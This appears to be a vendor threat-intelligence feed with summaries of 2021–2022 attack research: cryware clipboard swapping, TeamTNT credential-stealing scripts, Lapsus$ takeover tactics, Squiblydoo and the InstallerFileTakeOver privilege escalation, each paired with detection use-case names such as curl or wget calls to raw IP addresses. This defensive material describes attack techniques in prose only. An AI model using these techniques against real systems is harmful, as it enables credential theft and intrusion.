Cryware

May 24, 2022

Cryware

Industry: N/A | Level: Strategic | Source: Microsoft

Microsoft’s latest research investigates the rise of Cryware targeting hot wallets (aka non-custodial cryptocurrency wallets). Cryware takes advantage of the accessibility of data stored locally on a user’s device to initiate information theft and conduct crypto transactions. An attacker’s objectives are aimed to obtain data associated with the hot wallet including private keys, seed phrases, and wallet addresses. With the information obtained a crypto transaction can be initiated and using the irreversible nature of blockchain transactions, and the victim is unable to recover their funds. The transaction can also be conducted without victim consent. Given the data strings used for wallet data (private key, seed phrase, and wallet address), attackers can craft regular expressions (regexes) to locate the information using a variety of techniques including, memory dumping, keylogging, exfiltrating the wallet’s application storage files, and clipping and switching. The clipping and switching technique involves “a Cryware monitors the contents of a user’s clipboard and uses string search patterns to look for and identify a string resembling a hot wallet address. If the target user pastes or uses CTRL + V into an application window, the Cryware replaces the object in the clipboard with the attacker’s address.”

TeamTNT Scripts

April 26, 2022

TeamTNT Scripts

Industry: N/A | Level: Tactical | Source: CiscoTalos

Various script files used by the threat group, TeamTNT against AWS and Alibaba have been examined by Cisco Talos. The scripts target Amazon Web Services (AWS), on-premise containers, and some Linux instances. The  ability of the scripts  varies as they are capable of initiating cryptocurrency mining, credential gathering, downloading additional payloads, modifying file permissions, disabling tools, and achieving persistence and lateral movement. An AWS credential discovery and stealing script “GRABBER_aws_cloud.sh” can  enumerate the host’s directory, querying for the string AWS. When matches are identified, the script writes the result to a file, exfiltrates the data, and deletes the created file. Scripts downloading payloads often conduct a check on the system’s architecture to ensure a compatible script is downloaded for execution. TeamTNT is quite proficient in the cloud space, in addition to the abundance of robust scripts, the group has initiated techniques observed by Trend Micro, Cado Security, and Cisco Talos to disable cloud security and cloud logs. Whilst agents associated with Alibaba, Tencent, and BMC Helix Cloud Security were targeted some omissions have been observed by Cisco Talos, “TeamTNT does not make any attempts to disable the AWS CloudWatch agent, Microsoft Defender, Google Cloud Monitor, Cisco Secure Cloud Analytics, CrowdStrike Falcon, Palo Alto Prisma Cloud, or other common United States cloud security tools.”

  • Anvilogic Scenario: Unix File Download, Modified, Executed
  • Anvilogic Use Cases:
    • Locate Credentials
    • Linux CURL or WGET Direct to IPv4 Address
    • File Download (Unix)
    • Rare shell script execution
    • Service Stop Commands
    • Output to File
    • Modify File Attributes
    • New Linux Service Started/Enabled
    • File Modified for Execution
    • File Execution (Unix)
    • New Docker Container

Microsoft Confirms LAPSUS$ Hack & Analysis

March 29, 2022

 

Microsoft Confirms LAPSUS$ Hack & Analysis

Industry: Technology | Level: Strategic | Source: Microsoft

Microsoft Security teams provide analysis on Lapsus$ (tracked by Microsoft as DEV-0537) data extortion group. Microsoft also confirms their data breach from Lapsus$ compromising project source code for Bing and Cortana. Microsoft statement for the impact and cause details “no customer code or data was involved in the observed activities. Our investigation has found a single account had been compromised, granting limited access. Our cybersecurity response teams quickly engaged to remediate the compromised account and prevent further activity.” Microsoft shares details of observed tactics, techniques and procedures (TTP). Initial access was obtained fairly similar to most threat actor groups, gathering credentials from malware information-stealers such as redline, purchasing through access brokers and recruiting target company insiders (specific industries targets include those in telecommunication and technology-related.) In regard to reconnaissance and privilege escalation, the group targets vulnerabilities on internal servers and searches internal repositories for credentials and secrets. The group gathers intelligence from joining crisis calls and/or observing internal message channels to understand the organization’s incident response workflow. In the final stages of the attack, the hackers often create global admin accounts on cloud tenants “If they successfully gain privileged access to an organization’s cloud tenant (either AWS or Azure), DEV-0537 creates global admin accounts in the organization’s cloud instances, sets an Office 365 tenant-level mail transport rule to send all mail in and out of the organization to the newly created account, and then removes all other global admin accounts, so only the actor has sole control of the cloud resources, effectively locking the organization out of all access. After exfiltration, DEV-0537 often deletes the target’s systems and resources.” The attackers utilize a VPN for data exfiltration however, are cognizant of alerts such as those involving impossible travel, and select a sensible egress location geographically based on their target.

Trending regsvr32 & Squiblydoo Technique

February 15, 2022

Trending regsvr32 & Squiblydoo Technique

Industry: N/A | Level: Tactical | Source: Uptycs

Native windows program, regsvr32, a weapon of choice for living-off-the-land binary (LOLBin), has seen increased usage in the wild by the Uptycs threat research team. The utility is combined with Squiblydoo technique, which is described by MITRE “Squiblydoo is a specific usage of regsvr32.dll to load a COM scriptlet directly from the internet and execute it in a way that bypasses application whitelisting.” Additional, insight from the Uptycs team has identified “over 500+ samples” leveraging regsv32 to register OCX files that are associated with ActiveX control. The majority of samples abusing regsvr32 have been Microsoft Excel files (mainly), followed by rich text files and Microsoft Word documents.

  • Anvilogic Use Cases:
    • Malicious Document Execution
    • regsvr32 Execution
    • Suspicious process Spawned by Java

Gamaredon/ACTINIUM & Ukraine

February 08, 2022

In-depth research, by Palo Alto Unit24 and Microsoft Threat Intelligence Center (MSTIC), found threat group, Gamaredon/ACTINIUM, has been actively targeting organizations in the Ukraine.

New Device Registration Tactic

February 01, 2022

New Device Registration Tactic

Industry: N/A | Level: Tactical | Source: Microsoft

Research from Microsoft identified threat activity with attackers taking advantage of users’ accounts with unregistered devices for MFA. The attackers are then utilizing those accounts to register their devices onto the target organization’s Azure Active Directory. The threat occurs in two waves. The first involving a phishing campaign aiming to steal credentials and add an outlook rule. the outlook rule has a consistent pattern with over one hundred identified mailboxes having specific rule entry. The second wave utilizes the stolen credentials to gain access and expand their foothold in the target’s environment. Targeted organizations were located mostly in Australia, Singapore, Indonesia, and Thailand.

  • Anvilogic Use Cases:
    • O365 Inbox Rules
    • Add user to Azure AD Group or Role

InstallerFileTakeOver in use by Threat Actors

November 24, 2021

InstallerFileTakeOver in use by Threat Actors

Industry: N/A | Level: Tactical | Source: CiscoTalos

Follow up on the vulnerability identified by security researcher, Abdelhamid Naceri, regarding the bypass of CVE-2021-41379 that was not properly patched by Microsoft in November 2021’s patch Tuesday. The vulnerability enables a user to elevate their privileges to admin. Cisco Talos has identified malware samples in the wild taking advantage of this vulnerability.

  • Anvilogic Use Case: Potential InstallerFileTakeOver CVE-2021-41379

APT37 and Chinotto Malware

November 24, 2021

APT37 and APT37Malware

Industry: Media & Nonprofit | Level: Tactical | Source: SecureList

North Korean nation-state sponsored group APT37/ScarCruft/Temp.Reaper has been identified by Kaspersky for targeting South Korean journalists defectors, and human rights activists. The group utilized malware, Chinott, distributing through watering holes, spear-phishing emails, and smishing attacks. A news organization had data stolen and evidence found the attackers had access to their environment for several months. The malware versions were observed in PowerShell, Windows, and Android with similar command and control schemes based in HTTP. Additional malware capabilities observed the ability to modify registry keys (specifically enabling trust access for VBA), register a PowerShell command in the Run registry for persistence to execute an HTA file with mshta, and collect files staged a bat folder.

  • Anvilogic Scenario: APT37 & “Chinotto” Malware
  • Anvilogic Use Cases:
    • Query Registry
    • New AutoRun Registry Key
    • MSHTA.exe execution
    • Data Staged to File

CVE-2021-41379 Patch Bypass = InstallerFileTakeOver

November 23, 2021

CVE-2021-41379 Patch Bypass = InstallerFileTakeOver

Industry: N/A | Level: Tactical | Source: BleepingComputer

Security researcher, Abdelhamid Naceri, was able to bypass a vulnerability Microsoft intended to patch as part of the November 2021 patch cycle, tracked under CVE-2021-41379. The exploit is tracked under the name, InstallerFileTakeOver. The exploit affects all supported versions of Windows including Windows 10, 11 and Windows Server 2022, enabling a user to obtain admin level privileges. BleepingComputer validated the ease and use of the exploit, “tested the exploit and used it to open to command prompt with SYSTEM privileges from an account with only low-level ‘Standard’ privileges. Using this vulnerability, threat actors with limited access to a compromised device can easily elevate their privileges to help spread laterally within the network.”

  • Anvilogic Use Case: Potential InstallerFileTakeOver CVE-2021-41379